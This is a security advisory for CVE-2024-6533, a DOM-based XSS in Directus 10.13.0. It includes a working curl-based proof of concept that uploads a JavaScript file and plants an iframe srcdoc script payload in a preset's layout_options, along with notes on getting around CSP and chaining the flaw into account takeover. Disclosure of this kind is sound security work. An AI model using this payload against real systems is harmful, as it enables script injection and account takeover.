---
slug: advisories/bocelli/
title: Directus 10.13.0 - DOM-based XSS
authors: Miguel Gómez
writer: agomez
codename: bocelli
product: Directus 10.13.0
date: 2024-08-14 12:00 COT
cveid: CVE-2024-6533
severity: 4.1
description: Directus 10.13.0 - DOM-Based cross-site scripting (XSS) via layout_options
keywords: Fluid Attacks, Security, Vulnerabilities, Directus, XSS, DOM XSS, Account Takeover, CVE
banner: advisories-bg
advise: yes
template: advisory
---

## Summary

<summary-table
    name="Directus 10.13.0 - DOM-Based cross-site scripting (XSS) via layout_options"
    code="[Bocelli](https://en.wikipedia.org/wiki/Andrea_Bocelli)"
    product="Directus"
    affected-versions="10.13.0"
    fixed-versions=""
    state="Public"
    release="">
</summary-table>

## Vulnerability

<vulnerability-table
    kind="DOM-Based cross-site scripting (XSS)"
    rule="[371. DOM-Based cross-site scripting (XSS)](https://help.fluidattacks.com/portal/en/kb/articles/criteria-vulnerabilities-371)"
    remote="Yes"
    vector="CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N/E:H/RL:U/RC:C"
    score="4.1"
    available="Yes"
    id="[CVE-2024-6533](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6533)">
</vulnerability-table>

## Description

Directus v10.13.0 allows an authenticated external attacker to execute
arbitrary JavaScript on the client. This is possible because the application
injects an attacker-controlled parameter that will be stored in the server and
used by the client into an unsanitized DOM element. When chained with
CVE-2024-6534, it could result in account takeover.

## Vulnerability

This vulnerability occurs because the application injects an
attacker-controlled parameter that will be stored in the server and used by
the client into an unsanitized DOM element.

### Exploit

To exploit this vulnerability, we need to do the following steps using a
non-administrative, default role attacker account.

1. Upload the following JavaScript file.

    Using the upload functionality at `POST /files`. This PoC will show an
    alert message.

    ```bash
    export TARGET_HOST="http://localhost:8055"
    export ATTACKER_EMAIL="malicious@malicious.com"
    export ATTACKER_PASSWORD="123456"
    root_dir=$(dirname $0)
    mkdir "${root_dir}/static"

    curl -s -k -o /dev/null -w "%{http_code}" -X 'POST' "${TARGET_HOST}/auth/login" \
        -c "${root_dir}/static/attacker_directus_session_token" \
        -H 'Content-Type: application/json' \
        -d "{\"email\":\"${ATTACKER_EMAIL}\",\"password\":\"${ATTACKER_PASSWORD}\",\"mode\":\"session\"}"

    id_url_file=$(echo "alert('Successful DOM-based XSS')" |
      curl -s -k -X 'POST' "${TARGET_HOST}/files" \
        -b "${root_dir}/static/attacker_directus_session_token" \
        -F "file=@-;type=application/x-javascript;filename=poc.js" | jq -r ".data.id")
    ```

2. Create a preset for a collection and store the preset ID.

    Or use a preset already created from `GET /presets`. The following example
    uses the direct_users preset.

    ```bash
    attacker_user_id=$(curl -s -k "${TARGET_HOST}/users/me" \
        -b "${root_dir}/static/attacker_directus_session_token" | jq -r ".data.id")

    curl -i -s -k -X 'POST' "${TARGET_HOST}/presets" \
      -H 'Content-Type: application/json' \
      -b "${root_dir}/static/attacker_directus_session_token" \
      --data-binary "{\"layout\":\"cards\",\"bookmark\":null,\"role\":null,\"user\":\"${attacker_user_id}\",\"search\":null,\"filter\":null,\"layout_query\":{\"cards\":{\"sort\":[\"email\"]}},\"layout_options\":{\"cards\":{\"icon\":\"account_circle\",\"title\":\"<iframe srcdoc=\\\"<script src='http://localhost:8055/assets/${id_url_file}'> </script>\\\">\",\"subtitle\":\"{{ email }}\",\"size\":4}},\"refresh_interval\":null,\"icon\":\"bookmark\",\"color\":null,\"collection\":\"directus_users\"}"
    ```

    When the user visits the view that uses the directus_users preset,
    the JavaScript file will be executed.

    Notes:

    Need to use an `iframe` to execute the malicious JavaScript file to bypass
    the CSP policies. The payload structure is
    `<iframe srcdoc=\"<script src='URL_MALICIOUS_FILE'> </script>\">`.

    We can target any collection that uses the vulnerable template structure that
    renders the layout option section.

    In this PoC, the target is the same user who sends the payload, but if the
    attacking user has permission to modify or create presets for other users or
    even if he does not have permissions but can chain with CVE-2024-6534, he can
    achieve an account takeover.

## Evidence of exploitation

![vulnerability-code-directus](https://res.cloudinary.com/fluid-attacks/image/upload/v1720203046/airs/advisories/directusxss/vulnerability-code-directus.png)

![vulnerability-directus](https://res.cloudinary.com/fluid-attacks/image/upload/v1720203047/airs/advisories/directusxss/vulnerability-directus.png)

<iframe src="https://res.cloudinary.com/fluid-attacks/video/upload/v1720203048/airs/advisories/directusxss/POC-DOM-Based-cross-site-scripting.mp4"
width="835" height="505" frameborder="0" title="POC-DOM-Based-cross-site-scripting.mp4"
webkitallowfullscreen mozallowfullscreen allowfullscreen
loading="lazy"></iframe>

![exploit-success-directus](https://res.cloudinary.com/fluid-attacks/image/upload/v1720203046/airs/advisories/directusxss/exploit-success-directus.png)

## Our security policy

We have reserved the ID CVE-2024-6533 to refer to this issue from now on.

* https://fluidattacks.com/advisories/policy/

## System Information

* Version: Directus 10.13.0

* Operating System: Any

## Mitigation

There is currently no patch available for this vulnerability.

## Credits

The vulnerability was discovered by
[Miguel Gómez](https://www.linkedin.com/in/conmagor) from
Fluid Attacks' Offensive Team.

## References

**Vendor page** <https://directus.io/>

## Timeline

<time-lapse
  discovered="2024-07-04"
  contacted="2024-07-15"
  replied="2024-07-16"
  confirmed=""
  patched=""
  disclosure="2024-08-14">
</time-lapse>
